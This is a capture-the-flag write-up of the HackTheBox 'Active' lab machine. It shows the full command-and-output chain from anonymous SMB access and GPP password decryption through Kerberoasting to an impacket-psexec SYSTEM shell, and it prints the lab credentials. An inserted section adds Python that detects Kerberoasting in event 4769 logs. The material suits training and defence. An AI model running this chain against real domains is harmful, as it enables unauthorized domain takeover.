Active

Today I am going to solve the Active box on HackTheBox to prepare for the OSCP certification.

Enumeration:

First we start with an nmap scan to identify which ports are open on the target machine:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ sudo nmap -sCV -p- --min-rate 1000 -vv 10.129.109.218 -oN nmap/services.nmap
Nmap scan report for 10.129.109.218                                                  
Host is up, received echo-reply ttl 127 (0.29s latency).          
Scanned at 2025-09-01 10:51:55 EDT for 153s                                                                                                                                
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:                                                                          
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)                
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-01 14:53:15Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC              
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127                      
464/tcp   open  kpasswd5?     syn-ack ttl 127                      
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0                                                                                          
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5722/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

<snipped>

The Nmap options I used:

  • -sCV: Run the default NSE scripts and detect service versions.

  • -p-: Scan all 65535 TCP ports.

  • --min-rate: Send packets no slower than the given rate per second (1000 here).

  • -vv: Increase the verbosity level.

  • -oN: Save the output in normal format to a file.

We can see that we are dealing with an Active Directory domain controller named DC, with multiple ports open: DNS on 53, Kerberos on 88, SMB on 445 and LDAP on 389, 636, 3268 and 3269.

I will add the domain active.htb and the target's hostname DC to my hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ cat /etc/hosts            
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.109.218 DC.active.htb active.htb DC

GPP Password Abuse:

Let's enumerate the shares using netexec and check whether a null session is allowed:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u '' -p '' --shares    
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\: 
SMB         10.129.109.218  445    DC               [*] Enumerated shares
SMB         10.129.109.218  445    DC               Share           Permissions     Remark
SMB         10.129.109.218  445    DC               -----           -----------     ------
SMB         10.129.109.218  445    DC               ADMIN$                          Remote Admin
SMB         10.129.109.218  445    DC               C$                              Default share
SMB         10.129.109.218  445    DC               IPC$                            Remote IPC
SMB         10.129.109.218  445    DC               NETLOGON                        Logon server share 
SMB         10.129.109.218  445    DC               Replication     READ            
SMB         10.129.109.218  445    DC               SYSVOL                          Logon server share 
SMB         10.129.109.218  445    DC               Users

  • -u: To specify a username.

  • -p: To specify a password.

  • --shares: To list out the shares.

We have READ permission on the Replication share, so we can connect to it with smbclient and see what it contains:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ smbclient //active.htb/replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
<snipped>
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.7 KiloBytes/sec) (average 1.0 KiloBytes/sec)
<snipped>
smb: \> exit

So we have a Group Policy Preferences file (Groups.xml), which typically contains a username and an AES-encrypted password (cpassword). Because Microsoft published the AES key used to protect it, the value can be decrypted with various tools; I will use gpp-decrypt:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ cat active.htb/Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Here we notice a domain user, SVC_TGS, and a cpassword attribute holding the encrypted password, which we pass to gpp-decrypt:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

Now we have a username and a password; let's check whether the credentials are valid using netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u svc_tgs -p GPPstillStandingStrong2k18    
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\svc_tgs:GPPstillStandingStrong2k18

The [+] indicates that these are valid domain credentials.

Privilege Escalation to Administrator:

Now that we have a valid domain user, we can use BloodHound to look for a path to compromise the whole domain.

BloodHound:

I will use rusthound-ce as the ingestor:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ rusthound-ce -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -d active.htb -f DC.active.htb
---------------------------------------------------                                                                                                                        
Initializing RustHound-CE at 12:04:54 on 09/01/25                                                                                                                          
Powered by @g0h4n_0
---------------------------------------------------

[2025-09-01T16:04:54Z INFO  rusthound_ce] Verbosity level: Info
[2025-09-01T16:04:54Z INFO  rusthound_ce] Collection method: All
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Connected to ACTIVE.HTB Active Directory!
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-09-01T16:04:55Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:04:58Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=active,DC=htb
[2025-09-01T16:04:58Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:00Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=active,DC=htb
[2025-09-01T16:05:00Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=active,DC=htb
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=active,DC=htb
[2025-09-01T16:05:02Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-01T16:05:03Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=active,DC=htb
[2025-09-01T16:05:03Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-01T16:05:03Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
[2025-09-01T16:05:03Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 5 users parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_users.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 49 groups parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_groups.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_computers.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_ous.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_domains.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_gpos.json created!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] 67 containers parsed!
[2025-09-01T16:05:03Z INFO  rusthound_ce::json::maker::common] .//20250901120503_active-htb_containers.json created!

RustHound-CE Enumeration Completed at 12:05:03 on 09/01/25! Happy Graphing!

Now let's start BloodHound CE:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ sudo bloodhound           
[sudo] password for kali:          
                                          
 Starting neo4j                       
Neo4j is not running.                
Directories in use:          
home:         /usr/share/neo4j                                                       
config:       /usr/share/neo4j/conf    
logs:         /etc/neo4j/logs   
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import                                                
data:         /etc/neo4j/data                                                        
certificates: /usr/share/neo4j/certificates           
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.                                                                      
Started neo4j (pid:54595). It is available at http://localhost:7474
There may be a short delay until the server is ready.                                                                                                                      
......................................................                                                                                                                     
 Bloodhound will start

I navigate to the File Ingest page and upload the data RustHound collected.

Kerberoasting:

If we check the Kerberoastable users, we find that the Administrator account has an SPN and is therefore Kerberoastable.

Using impacket-GetUserSPNs, let's request a TGS for the Administrator account:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ impacket-GetUserSPNs -dc-ip 10.129.109.218 active.htb/svc_tgs:GPPstillStandingStrong2k18 -request-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2025-09-01 10:28:00.613750             
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$c7c1db9ab6dc34c3a0a01009af9a0bb1$<snipped>

We save the ticket to a file and attempt to crack it with hashcat:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ hashcat administrator.hash /usr/share/wordlists/rockyou.txt

We were able to crack the administrator TGS ticket and recover the password.
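For the blue team, here is an added example (not from the original post) of the detection logic for this step: it scans Windows Security event 4769 records and flags successful service-ticket requests with RC4 encryption (etype 0x17, the $krb5tgs$23$ prefix seen above) for non-machine service accounts, which is exactly the request GetUserSPNs made here. The event records are a constructed sample and the field names follow the 4769 event XML.

```python
from collections import defaultdict

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP ticket encryption types

# Constructed 4769 records; the first one mirrors the Kerberoast performed above.
SAMPLE_EVENTS = [
    # svc_tgs requests a TGS for Administrator's SPN with RC4: the roast itself
    {"EventID": 4769, "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    # the DC requesting a ticket to itself: machine account, AES, benign
    {"EventID": 4769, "TargetUserName": "DC$@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.109.218", "Status": "0x0"},
    # a normal logon: a ticket for krbtgt is not a service ticket to a user account
    {"EventID": 4769, "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    # an RC4 request the KDC rejected (non-zero status): no ticket was issued
    {"EventID": 4769, "TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x1b"},
]

def is_kerberoast_candidate(ev):
    """True for a successful RC4 service-ticket request to a user (non-machine) account."""
    if ev.get("EventID") != 4769 or ev.get("Status", "0x0") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and the TGT service are not roastable user SPNs
    return ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES

def detect_kerberoast(events):
    """Group candidate requests by requester so one roast of many SPNs is one alert."""
    by_requester = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(services) for key, services in by_requester.items()}

if __name__ == "__main__":
    for (user, ip), services in detect_kerberoast(SAMPLE_EVENTS).items():
        print(f"ALERT {user} from {ip} requested RC4 service tickets for: {', '.join(services)}")
```

The fix on the target side is the same one that would have stopped this chain: remove the SPN from the built-in Administrator account, keep service accounts on long random passwords, and disable RC4 for them so the issued ticket is AES and far harder to crack.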

Checking those credentials with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ netexec smb 10.129.109.218 -u administrator -p Ticketmaster1968
SMB         10.129.109.218  445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) 
SMB         10.129.109.218  445    DC               [+] active.htb\administrator:Ticketmaster1968 (Pwn3d!)

We see Pwn3d!, which means we are domain admins; let's use impacket-psexec to get a shell on the target machine:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Active]
└─$ impacket-psexec active.htb/administrator:Ticketmaster1968@dc.active.htb                                             
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file IWKkxNEt.exe
[*] Opening SVCManager on dc.active.htb.....
[*] Creating service aNNp on dc.active.htb.....
[*] Starting service aNNp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC
C:\Windows\system32> ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::9868:c766:ba72:6acf
   Link-local IPv6 Address . . . . . : fe80::9868:c766:ba72:6acf%11
   IPv4 Address. . . . . . . . . . . : 10.129.109.218
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%11
                                       10.129.0.1
Tunnel adapter isatap..htb:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

And we can read the flags:

PS C:\Windows\System32> cat C:\Users\svc_tgs\Desktop\user.txt
b54499b9ab3855a9****************
PS C:\Windows\System32> cat C:\Users\administrator\Desktop\root.txt
3de721739719dece****************
